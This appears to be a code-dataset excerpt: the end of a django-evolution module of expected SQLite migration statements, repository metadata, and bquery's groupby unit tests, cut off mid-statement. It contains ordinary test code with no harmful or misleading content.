'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'rename_rename_field': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "renamed_field" varchar(20) NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
' SELECT "my_id", "char_field" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
})
return mappings
def evolver(connection):
"""SQL test statements for the EvolverTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
generate_index_name = make_generate_index_name(connection)
mappings = {
'complex_deps_new_db_new_models': [
'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel"'
' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "char_field" varchar(10) NOT NULL,'
' "fkey_id" integer NULL'
' REFERENCES "evolutions_app_evolutionsapptestmodel" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel2"'
' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "fkey_id" integer NULL'
' REFERENCES "evolutions_app2_evolutionsapp2testmodel" ("id")'
' DEFERRABLE INITIALLY DEFERRED,'
' "int_field" integer NOT NULL);',
'CREATE TABLE "evolutions_app_evolutionsapptestmodel"'
' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "char_field" varchar(10) NULL,'
' "char_field2" varchar(20) NULL);',
'CREATE INDEX "%s" ON "evolutions_app2_evolutionsapp2testmodel"'
' ("fkey_id");'
% generate_index_name('evolutions_app2_evolutionsapp2testmodel',
'fkey_id', 'fkey'),
'CREATE INDEX "%s" ON "evolutions_app2_evolutionsapp2testmodel2"'
' ("fkey_id");'
% generate_index_name('evolutions_app2_evolutionsapp2testmodel2',
'fkey_id', 'fkey'),
],
'complex_deps_upgrade_task_1': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(10) NULL,'
' "char_field2" varchar(20) NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "char_field2")'
' SELECT "id", "char_field", "char_field2"'
' FROM "evolutions_app_evolutionsapptestmodel";',
'DROP TABLE "evolutions_app_evolutionsapptestmodel";',
'ALTER TABLE "TEMP_TABLE"'
' RENAME TO "evolutions_app_evolutionsapptestmodel";',
],
'complex_deps_upgrade_task_2': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(10) NOT NULL,'
' "fkey_id" integer NULL'
' REFERENCES "evolutions_app_evolutionsapptestmodel" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field")'
' SELECT "id", "char_field"'
' FROM "evolutions_app2_evolutionsapp2testmodel";',
'DROP TABLE "evolutions_app2_evolutionsapp2testmodel";',
'ALTER TABLE "TEMP_TABLE"'
' RENAME TO "evolutions_app2_evolutionsapp2testmodel";',
'CREATE INDEX "%s" ON "evolutions_app2_evolutionsapp2testmodel"'
' ("fkey_id");'
% generate_index_name('evolutions_app2_evolutionsapp2testmodel',
'fkey_id', 'fkey'),
],
'evolve_app_task': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "value" varchar(100) NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "value")'
' SELECT "id", "value" FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'purge_app_task': [
'DROP TABLE "tests_testmodel";',
],
}
if django_version >= (1, 7):
mappings.update({
'create_table': [
'CREATE TABLE "tests_testmodel" '
'("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "value" varchar(100) NOT NULL);',
],
})
else:
mappings.update({
'create_table': [
'CREATE TABLE "tests_testmodel" (',
' "id" integer NOT NULL PRIMARY KEY,',
' "value" varchar(100) NOT NULL',
')',
';',
],
})
if django_version >= (2, 0):
mappings.update({
'complex_deps_new_db_new_models': [
'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel"'
' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "char_field" varchar(10) NOT NULL,'
' "fkey_id" integer NULL'
' REFERENCES "evolutions_app_evolutionsapptestmodel" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel2"'
' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "fkey_id" integer NULL'
' REFERENCES "evolutions_app2_evolutionsapp2testmodel" ("id")'
' DEFERRABLE INITIALLY DEFERRED,'
' "int_field" integer NOT NULL);',
'CREATE TABLE "evolutions_app_evolutionsapptestmodel"'
' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "char_field" varchar(10) NULL,'
' "char_field2" varchar(20) NULL);',
'CREATE INDEX "%s"'
' ON "evolutions_app2_evolutionsapp2testmodel" ("fkey_id");'
% generate_index_name(
'evolutions_app2_evolutionsapp2testmodel',
'fkey_id',
'fkey'),
'CREATE INDEX "%s"'
' ON "evolutions_app2_evolutionsapp2testmodel2" ("fkey_id");'
% generate_index_name(
'evolutions_app2_evolutionsapp2testmodel2',
'fkey_id',
'fkey'),
],
'create_tables_with_deferred_refs': [
'CREATE TABLE "tests_testmodel" '
'("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "value" varchar(100) NOT NULL,'
' "ref_id" integer NOT NULL'
' REFERENCES "evolutions_app_reffedevolvertestmodel" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'CREATE TABLE "evolutions_app_reffedevolvertestmodel" '
'("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "value" varchar(100) NOT NULL);',
'CREATE INDEX "%s" ON "tests_testmodel" ("ref_id");'
% generate_index_name('tests_testmodel', 'ref_id'),
],
})
elif django_version >= (1, 7):
mappings.update({
'complex_deps_new_db_new_models': [
'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel"'
' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "char_field" varchar(10) NOT NULL,'
' "fkey_id" integer NULL'
' REFERENCES "evolutions_app_evolutionsapptestmodel" ("id"));',
'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel2"'
' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "fkey_id" integer NULL'
' REFERENCES "evolutions_app2_evolutionsapp2testmodel" ("id"),'
' "int_field" integer NOT NULL);',
'CREATE TABLE "evolutions_app_evolutionsapptestmodel"'
' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "char_field" varchar(10) NULL,'
' "char_field2" varchar(20) NULL);',
'CREATE INDEX "%s"'
' ON "evolutions_app2_evolutionsapp2testmodel" ("fkey_id");'
% generate_index_name(
'evolutions_app2_evolutionsapp2testmodel',
'fkey_id',
'fkey'),
'CREATE INDEX "%s"'
' ON "evolutions_app2_evolutionsapp2testmodel2" ("fkey_id");'
% generate_index_name(
'evolutions_app2_evolutionsapp2testmodel2',
'fkey_id',
'fkey'),
],
'create_tables_with_deferred_refs': [
'CREATE TABLE "tests_testmodel" '
'("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "value" varchar(100) NOT NULL,'
' "ref_id" integer NOT NULL'
' REFERENCES "evolutions_app_reffedevolvertestmodel" ("id"));',
'CREATE TABLE "evolutions_app_reffedevolvertestmodel" '
'("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
' "value" varchar(100) NOT NULL);',
'CREATE INDEX "%s" ON "tests_testmodel" ("ref_id");'
% generate_index_name('tests_testmodel', 'ref_id'),
],
})
else:
mappings.update({
'complex_deps_new_db_new_models': [
'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel" (',
' "id" integer NOT NULL PRIMARY KEY,',
' "char_field" varchar(10) NOT NULL,',
' "fkey_id" integer',
')',
';',
'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel2" (',
' "id" integer NOT NULL PRIMARY KEY,',
' "fkey_id" integer REFERENCES'
' "evolutions_app2_evolutionsapp2testmodel" ("id"),',
' "int_field" integer NOT NULL',
')',
';',
'CREATE TABLE "evolutions_app_evolutionsapptestmodel" (',
' "id" integer NOT NULL PRIMARY KEY,',
' "char_field" varchar(10),',
' "char_field2" varchar(20)',
')',
';',
'CREATE INDEX "%s"'
' ON "evolutions_app2_evolutionsapp2testmodel" ("fkey_id");'
% generate_index_name(
'evolutions_app2_evolutionsapp2testmodel',
'fkey_id',
'fkey'),
'CREATE INDEX "%s"'
' ON "evolutions_app2_evolutionsapp2testmodel2" ("fkey_id");'
% generate_index_name(
'evolutions_app2_evolutionsapp2testmodel2',
'fkey_id',
'fkey'),
],
'create_tables_with_deferred_refs': [
'CREATE TABLE "tests_testmodel" (',
' "id" integer NOT NULL PRIMARY KEY,',
' "value" varchar(100) NOT NULL,',
' "ref_id" integer NOT NULL',
')',
';',
'CREATE TABLE "evolutions_app_reffedevolvertestmodel" (',
' "id" integer NOT NULL PRIMARY KEY,',
' "value" varchar(100) NOT NULL',
')',
';',
'CREATE INDEX "%s" ON "tests_testmodel" ("ref_id");'
% generate_index_name('tests_testmodel', 'ref_id', 'ref'),
],
})
return mappings
| 39.081399
| 79
| 0.522915
| 11,088
| 116,189
| 5.162518
| 0.030393
| 0.114706
| 0.078509
| 0.042486
| 0.915552
| 0.905611
| 0.894763
| 0.879215
| 0.871842
| 0.863859
| 0
| 0.015381
| 0.354818
| 116,189
| 2,972
| 80
| 39.094549
| 0.748222
| 0.036191
| 0
| 0.857778
| 1
| 0
| 0.593034
| 0.087296
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007111
| false
| 0
| 0.002222
| 0
| 0.016889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c99956bdac59c64bb241706d5f973287f4bfdbc4
| 34,158
|
py
|
Python
|
bquery/tests/test_ctable.py
|
simon-castano/bquery
|
84bc138681ced2a8fdf2d3add49e4a72f3f35ed4
|
[
"BSD-3-Clause"
] | 56
|
2015-01-08T15:35:13.000Z
|
2020-03-11T16:13:15.000Z
|
bquery/tests/test_ctable.py
|
simon-castano/bquery
|
84bc138681ced2a8fdf2d3add49e4a72f3f35ed4
|
[
"BSD-3-Clause"
] | 62
|
2015-01-03T15:57:13.000Z
|
2021-08-11T11:36:49.000Z
|
bquery/tests/test_ctable.py
|
simon-castano/bquery
|
84bc138681ced2a8fdf2d3add49e4a72f3f35ed4
|
[
"BSD-3-Clause"
] | 19
|
2015-01-03T11:49:13.000Z
|
2020-01-31T10:00:03.000Z
|
import os
import random
import itertools
import tempfile
import shutil
import math
import itertools as itt
from contextlib import contextmanager
import nose
import numpy as np
import bcolz as bz
from numpy.testing import assert_array_equal
from numpy.testing import assert_allclose
from nose.tools import assert_list_equal
import bquery
class TestCtable(object):
@contextmanager
def on_disk_data_cleaner(self, data):
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
ct = bquery.ctable(data, rootdir=self.rootdir)
# print(ct)
ct.flush()
ct = bquery.open(self.rootdir)
yield ct
shutil.rmtree(self.rootdir)
self.rootdir = None
def setup(self):
print('TestCtable.setup')
self.rootdir = None
def teardown(self):
print('TestCtable.teardown')
if self.rootdir:
shutil.rmtree(self.rootdir)
self.rootdir = None
def gen_dataset_count(self, N):
pool = itertools.cycle(['a', 'a',
'b', 'b', 'b',
'c', 'c', 'c', 'c', 'c'])
pool_b = itertools.cycle([0.0, 0.0,
1.0, 1.0, 1.0,
3.0, 3.0, 3.0, 3.0, 3.0])
pool_c = itertools.cycle([0, 0, 1, 1, 1, 3, 3, 3, 3, 3])
pool_d = itertools.cycle([0, 0, 1, 1, 1, 3, 3, 3, 3, 3])
for _ in range(N):
d = (
next(pool),
next(pool_b),
next(pool_c),
next(pool_d),
random.random(),
random.randint(- 10, 10),
random.randint(- 10, 10),
)
yield d
def gen_dataset_count_with_NA(self, N):
pool = itertools.cycle(['a', 'a',
'b', 'b', 'b',
'c', 'c', 'c', 'c', 'c'])
pool_b = itertools.cycle([0.0, 0.1,
1.0, 1.0, 1.0,
3.0, 3.0, 3.0, 3.0, 3.0])
pool_c = itertools.cycle([0, 0, 1, 1, 1, 3, 3, 3, 3, 3])
pool_d = itertools.cycle([0, 0, 1, 1, 1, 3, 3, 3, 3, 3])
pool_e = itertools.cycle([np.nan, 0.0,
np.nan, 1.0, 1.0,
np.nan, 3.0, 3.0, 3.0, 3.0])
for _ in range(N):
d = (
next(pool),
next(pool_b),
next(pool_c),
next(pool_d),
next(pool_e),
random.randint(- 10, 10),
random.randint(- 10, 10),
)
yield d
def gen_almost_unique_row(self, N):
pool = itertools.cycle(['a', 'b', 'c', 'd', 'e'])
pool_b = itertools.cycle([1.1, 1.2])
pool_c = itertools.cycle([1, 2, 3])
pool_d = itertools.cycle([1, 2, 3])
for _ in range(N):
d = (
next(pool),
next(pool_b),
next(pool_c),
next(pool_d),
random.random(),
random.randint(- 10, 10),
random.randint(- 10, 10),
)
yield d
def helper_itt_groupby(self, data, keyfunc):
groups = []
uniquekeys = []
data = sorted(data,
key=keyfunc) # mandatory before calling itertools groupby!
for k, g in itt.groupby(data, keyfunc):
groups.append(list(g)) # Store group iterator as a list
uniquekeys.append(k)
result = {
'groups': groups,
'uniquekeys': uniquekeys
}
return result
def test_groupby_01(self):
"""
test_groupby_01: Test groupby's group creation
(groupby single row rsults into multiple groups)
"""
random.seed(1)
groupby_cols = ['f0']
groupby_lambda = lambda x: x[0]
# no operation is specified in `agg_list`, so `sum` is used by default.
agg_list = ['f4', 'f5', 'f6']
num_rows = 2000
# -- Data --
g = self.gen_almost_unique_row(num_rows)
data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
# -- Bcolz --
print('--> Bcolz')
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
fact_bcolz.flush()
fact_bcolz.cache_factor(groupby_cols, refresh=True)
result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
print(result_bcolz)
# Itertools result
print('--> Itertools')
result_itt = self.helper_itt_groupby(data, groupby_lambda)
uniquekeys = result_itt['uniquekeys']
print(uniquekeys)
assert_list_equal(list(result_bcolz['f0']), uniquekeys)
def test_groupby_02(self):
"""
test_groupby_02: Test groupby's group creation
(groupby over multiple rows results
into multiple groups)
"""
random.seed(1)
groupby_cols = ['f0', 'f1', 'f2']
groupby_lambda = lambda x: [x[0], x[1], x[2]]
# no operation is specified in `agg_list`, so `sum` is used by default.
agg_list = ['f4', 'f5', 'f6']
num_rows = 2000
# -- Data --
g = self.gen_almost_unique_row(num_rows)
data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
# -- Bcolz --
print('--> Bcolz')
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
fact_bcolz.flush()
fact_bcolz.cache_factor(groupby_cols, refresh=True)
result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
print(result_bcolz)
# Itertools result
print('--> Itertools')
result_itt = self.helper_itt_groupby(data, groupby_lambda)
uniquekeys = result_itt['uniquekeys']
print(uniquekeys)
assert_list_equal(
sorted([list(x) for x in result_bcolz[groupby_cols]]),
sorted(uniquekeys))
def test_groupby_03(self):
"""
test_groupby_03: Test groupby's aggregations
(groupby single row results into multiple groups)
Groupby type 'sum'
"""
random.seed(1)
groupby_cols = ['f0']
groupby_lambda = lambda x: x[0]
agg_list = ['f4', 'f5', 'f6']
agg_lambda = lambda x: [x[4], x[5], x[6]]
num_rows = 2000
# -- Data --
g = self.gen_almost_unique_row(num_rows)
data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
# -- Bcolz --
print('--> Bcolz')
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
fact_bcolz.flush()
fact_bcolz.cache_factor(groupby_cols, refresh=True)
result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
print(result_bcolz)
# Itertools result
print('--> Itertools')
result_itt = self.helper_itt_groupby(data, groupby_lambda)
uniquekeys = result_itt['uniquekeys']
print(uniquekeys)
ref = []
for item in result_itt['groups']:
f4 = 0
f5 = 0
f6 = 0
for row in item:
f0 = groupby_lambda(row)
f4 += row[4]
f5 += row[5]
f6 += row[6]
ref.append([f0, f4, f5, f6])
assert_list_equal(
[list(x) for x in result_bcolz], ref)
def test_groupby_04(self):
"""
test_groupby_04: Test groupby's aggregation
(groupby over multiple rows results
into multiple groups)
Groupby type 'sum'
"""
random.seed(1)
groupby_cols = ['f0', 'f1', 'f2']
groupby_lambda = lambda x: [x[0], x[1], x[2]]
agg_list = ['f4', 'f5', 'f6']
agg_lambda = lambda x: [x[4], x[5], x[6]]
num_rows = 2000
# -- Data --
g = self.gen_almost_unique_row(num_rows)
data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
# -- Bcolz --
print('--> Bcolz')
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
fact_bcolz.flush()
fact_bcolz.cache_factor(groupby_cols, refresh=True)
result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
print(result_bcolz)
# Itertools result
print('--> Itertools')
result_itt = self.helper_itt_groupby(data, groupby_lambda)
uniquekeys = result_itt['uniquekeys']
print(uniquekeys)
ref = []
for item in result_itt['groups']:
f4 = 0
f5 = 0
f6 = 0
for row in item:
f0 = groupby_lambda(row)
f4 += row[4]
f5 += row[5]
f6 += row[6]
ref.append(f0 + [f4, f5, f6])
assert_list_equal(
sorted([list(x) for x in result_bcolz]),
sorted(ref))
def test_groupby_05(self):
"""
test_groupby_05: Test groupby's group creation without cache
Groupby type 'sum'
"""
random.seed(1)
groupby_cols = ['f0']
groupby_lambda = lambda x: x[0]
agg_list = ['f1']
num_rows = 200
for _dtype in \
[
'i8',
'i4',
'f8',
'S1',
]:
# -- Data --
if _dtype == 'S1':
iterable = ((str(x % 5), x % 5) for x in range(num_rows))
else:
iterable = ((x % 5, x % 5) for x in range(num_rows))
data = np.fromiter(iterable, dtype=_dtype + ',i8')
# -- Bcolz --
print('--> Bcolz')
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
fact_bcolz.flush()
result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
print(result_bcolz)
# Itertools result
print('--> Itertools')
result_itt = self.helper_itt_groupby(data, groupby_lambda)
uniquekeys = result_itt['uniquekeys']
print(uniquekeys)
ref = []
for item in result_itt['groups']:
f1 = 0
for row in item:
f0 = row[0]
f1 += row[1]
ref.append([f0] + [f1])
assert_list_equal(
sorted([list(x) for x in result_bcolz]),
sorted(ref))
yield self._assert_list_equal, list(result_bcolz['f0']), uniquekeys
def test_groupby_06(self):
"""
test_groupby_06: Groupby type 'count'
"""
random.seed(1)
groupby_cols = ['f0']
groupby_lambda = lambda x: x[0]
agg_list = [['f4', 'count'], ['f5', 'count'], ['f6', 'count']]
num_rows = 2000
# -- Data --
g = self.gen_dataset_count(num_rows)
data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
# -- Bcolz --
print('--> Bcolz')
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
fact_bcolz.flush()
fact_bcolz.cache_factor(groupby_cols, refresh=True)
result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
print(result_bcolz)
# Itertools result
print('--> Itertools')
result_itt = self.helper_itt_groupby(data, groupby_lambda)
uniquekeys = result_itt['uniquekeys']
print(uniquekeys)
ref = []
for item in result_itt['groups']:
f4 = 0
f5 = 0
f6 = 0
for row in item:
f0 = groupby_lambda(row)
f4 += 1
f5 += 1
f6 += 1
ref.append([f0, f4, f5, f6])
assert_list_equal(
[list(x) for x in result_bcolz], ref)
def test_groupby_07(self):
"""
test_groupby_07: Groupby type 'count'
"""
random.seed(1)
groupby_cols = ['f0']
groupby_lambda = lambda x: x[0]
agg_list = [['f4', 'count'], ['f5', 'count'], ['f6', 'count']]
num_rows = 1000
# -- Data --
g = self.gen_dataset_count_with_NA(num_rows)
data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
# -- Bcolz --
print('--> Bcolz')
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
fact_bcolz.flush()
fact_bcolz.cache_factor(groupby_cols, refresh=True)
result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
print(result_bcolz)
# Itertools result
print('--> Itertools')
result_itt = self.helper_itt_groupby(data, groupby_lambda)
uniquekeys = result_itt['uniquekeys']
print(uniquekeys)
ref = []
for item in result_itt['groups']:
f4 = 0
f5 = 0
f6 = 0
for row in item:
f0 = groupby_lambda(row)
if row[4] == row[4]:
f4 += 1
f5 += 1
f6 += 1
ref.append([f0, f4, f5, f6])
assert_list_equal(
[list(x) for x in result_bcolz], ref)
def _get_unique(self, values):
new_values = []
nan_found = False
for item in values:
if item not in new_values:
if item == item:
new_values.append(item)
else:
if not nan_found:
new_values.append(item)
nan_found = True
return new_values
def gen_dataset_count_with_NA_08(self, N):
pool = itertools.cycle(['a', 'a',
'b', 'b', 'b',
'c', 'c', 'c', 'c', 'c'])
pool_b = itertools.cycle([0.0, 0.1,
1.0, 1.0, 1.0,
3.0, 3.0, 3.0, 3.0, 3.0])
pool_c = itertools.cycle([0, 0, 1, 1, 1, 3, 3, 3, 3, 3])
pool_d = itertools.cycle([0, 0, 1, 1, 1, 3, 3, 3, 3, 3])
pool_e = itertools.cycle([np.nan, 0.0,
np.nan, 0.0, 1.0,
np.nan, 3.0, 1.0, 3.0, 1.0])
for _ in range(N):
d = (
next(pool),
next(pool_b),
next(pool_c),
next(pool_d),
next(pool_e),
random.randint(- 500, 500),
random.randint(- 100, 100),
)
yield d
def test_groupby_08(self):
"""
test_groupby_08: Groupby's type 'count_distinct'
"""
random.seed(1)
groupby_cols = ['f0']
groupby_lambda = lambda x: x[0]
agg_list = [['f4', 'count_distinct'], ['f5', 'count_distinct'], ['f6', 'count_distinct']]
num_rows = 2000
# -- Data --
g = self.gen_dataset_count_with_NA_08(num_rows)
data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
print('data')
print(data)
# -- Bcolz --
print('--> Bcolz')
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
fact_bcolz.flush()
fact_bcolz.cache_factor(groupby_cols, refresh=True)
result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
print(result_bcolz)
#
# # Itertools result
print('--> Itertools')
result_itt = self.helper_itt_groupby(data, groupby_lambda)
uniquekeys = result_itt['uniquekeys']
print(uniquekeys)
ref = []
for n, (u, item) in enumerate(zip(uniquekeys, result_itt['groups'])):
f4 = len(self._get_unique([x[4] for x in result_itt['groups'][n]]))
f5 = len(self._get_unique([x[5] for x in result_itt['groups'][n]]))
f6 = len(self._get_unique([x[6] for x in result_itt['groups'][n]]))
ref.append([u, f4, f5, f6])
assert_list_equal(
[list(x) for x in result_bcolz], ref)
def test_groupby_08b(self):
"""
test_groupby_08b: Groupby's type 'count_distinct' with a large number of records
"""
random.seed(1)
groupby_cols = ['f0']
groupby_lambda = lambda x: x[0]
agg_list = [['f4', 'count_distinct'], ['f5', 'count_distinct'], ['f6', 'count_distinct']]
num_rows = 200000
# -- Data --
g = self.gen_dataset_count_with_NA_08(num_rows)
data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
print('data')
print(data)
# -- Bcolz --
print('--> Bcolz')
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
fact_bcolz.flush()
fact_bcolz.cache_factor(groupby_cols, refresh=True)
result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
print(result_bcolz)
#
# # Itertools result
print('--> Itertools')
result_itt = self.helper_itt_groupby(data, groupby_lambda)
uniquekeys = result_itt['uniquekeys']
print(uniquekeys)
ref = []
for n, (u, item) in enumerate(zip(uniquekeys, result_itt['groups'])):
f4 = len(self._get_unique([x[4] for x in result_itt['groups'][n]]))
f5 = len(self._get_unique([x[5] for x in result_itt['groups'][n]]))
f6 = len(self._get_unique([x[6] for x in result_itt['groups'][n]]))
ref.append([u, f4, f5, f6])
assert_list_equal(
[list(x) for x in result_bcolz], ref)
def gen_dataset_count_with_NA_09(self, N):
pool = (random.choice(['a', 'b', 'c']) for _ in range(N))
pool_b = (random.choice([0.1, 0.2, 0.3]) for _ in range(N))
pool_c = (random.choice([0, 1, 2, 3]) for _ in range(N))
pool_d = (random.choice([0, 1, 2, 3]) for _ in range(N))
pool_e = (math.ceil(x) for x in np.arange(0, N * 0.1, 0.1))
pool_f = (math.ceil(x) for x in np.arange(0, N * 0.3, 0.3))
pool_g = (math.ceil(x) for x in np.arange(0, N, 1))
for _ in range(N):
d = (
next(pool),
next(pool_b),
next(pool_c),
next(pool_d),
# --
next(pool_e),
next(pool_f),
next(pool_g),
)
yield d
def test_groupby_09(self):
"""
test_groupby_09: Groupby's type 'sorted_count_distinct'
"""
random.seed(1)
groupby_cols = ['f0']
groupby_lambda = lambda x: x[0]
agg_list = [['f4', 'sorted_count_distinct'], ['f5', 'sorted_count_distinct'], ['f6', 'sorted_count_distinct']]
num_rows = 2000
# -- Data --
g = self.gen_dataset_count_with_NA_09(num_rows)
sort = sorted([item for item in g], key=lambda x: x[0])
data = np.fromiter(sort, dtype='S1,f8,i8,i4,f8,i8,i4')
print('data')
print(data)
# -- Bcolz --
print('--> Bcolz')
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
fact_bcolz.flush()
result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
print(result_bcolz)
# # Itertools result
print('--> Itertools')
result_itt = self.helper_itt_groupby(data, groupby_lambda)
uniquekeys = result_itt['uniquekeys']
print(uniquekeys)
ref = []
for n, (u, item) in enumerate(zip(uniquekeys, result_itt['groups'])):
f4 = len(self._get_unique([x[4] for x in result_itt['groups'][n]]))
f5 = len(self._get_unique([x[5] for x in result_itt['groups'][n]]))
f6 = len(self._get_unique([x[6] for x in result_itt['groups'][n]]))
ref.append([u, f4, f5, f6])
print(ref)
assert_list_equal(
[list(x) for x in result_bcolz], ref)
def test_groupby_10(self):
"""
test_groupby_10: Groupby's 'sorted_count_distinct', no column provided
"""
random.seed(1)
groupby_cols = []
agg_list = [['f1', 'sorted_count_distinct'], ['f2', 'sorted_count_distinct']]
num_rows = 10
# -- Data --
data = np.array(
[(0, 1, 1),
(1, 1, 1),
(1, 2, 1),
(0, 2, 1),
(1, 2, 1),
(2, 2, 1),
(0, 3, 2),
(0, 3, 2),
(1, 4, 2)],
dtype='i8,i8,i8')
# -- Bcolz --
with self.on_disk_data_cleaner(data) as ct:
result_bcolz = ct.groupby(groupby_cols, agg_list)
assert_list_equal([list(x) for x in result_bcolz], [[4, 2]])
def test_groupby_11(self):
"""
test_groupby_11: Groupby's 'sorted_count_distinct', pre-filter &
no column provided
"""
random.seed(1)
groupby_cols = []
agg_list = [['f1', 'sorted_count_distinct'], ['f2', 'sorted_count_distinct']]
num_rows = 10
# -- Data --
data = np.array(
[(0, 1, 1),
(1, 1, 1),
(1, 2, 1),
(0, 2, 1),
(1, 2, 1),
(2, 2, 1),
(0, 3, 2),
(0, 3, 2),
(1, 4, 2)],
dtype='i8,i8,i8')
with self.on_disk_data_cleaner(data) as ct:
barr = ct.where_terms([('f0', 'in', [0])])
result_bcolz = ct.groupby(groupby_cols, agg_list,
bool_arr=barr)
assert_list_equal([list(x) for x in result_bcolz], [[3, 2]])
def test_groupby_12(self):
"""
test_groupby_12: Groupby's 'sorted_count_distinct', no column provided
"""
random.seed(1)
groupby_cols = []
agg_list = [['f1', 'sorted_count_distinct']]
num_rows = 10
# -- Data --
data = np.array(
[(0, 1),
(1, 1),
(1, 2),
(0, 2),
(1, 2),
(2, 2),
(0, 3),
(0, 3),
(1, 4)],
dtype='i8,i8')
with self.on_disk_data_cleaner(data) as ct:
result_bcolz = ct.groupby(groupby_cols, agg_list)
assert_list_equal([list(x) for x in result_bcolz], [[4]])
def test_groupby_13(self):
"""
test_groupby_13: Groupby's 'sorted_count_distinct', pre-filter
"""
random.seed(1)
groupby_cols = ['f0']
agg_list = [['f1', 'sorted_count_distinct']]
# -- Data --
data = np.array(
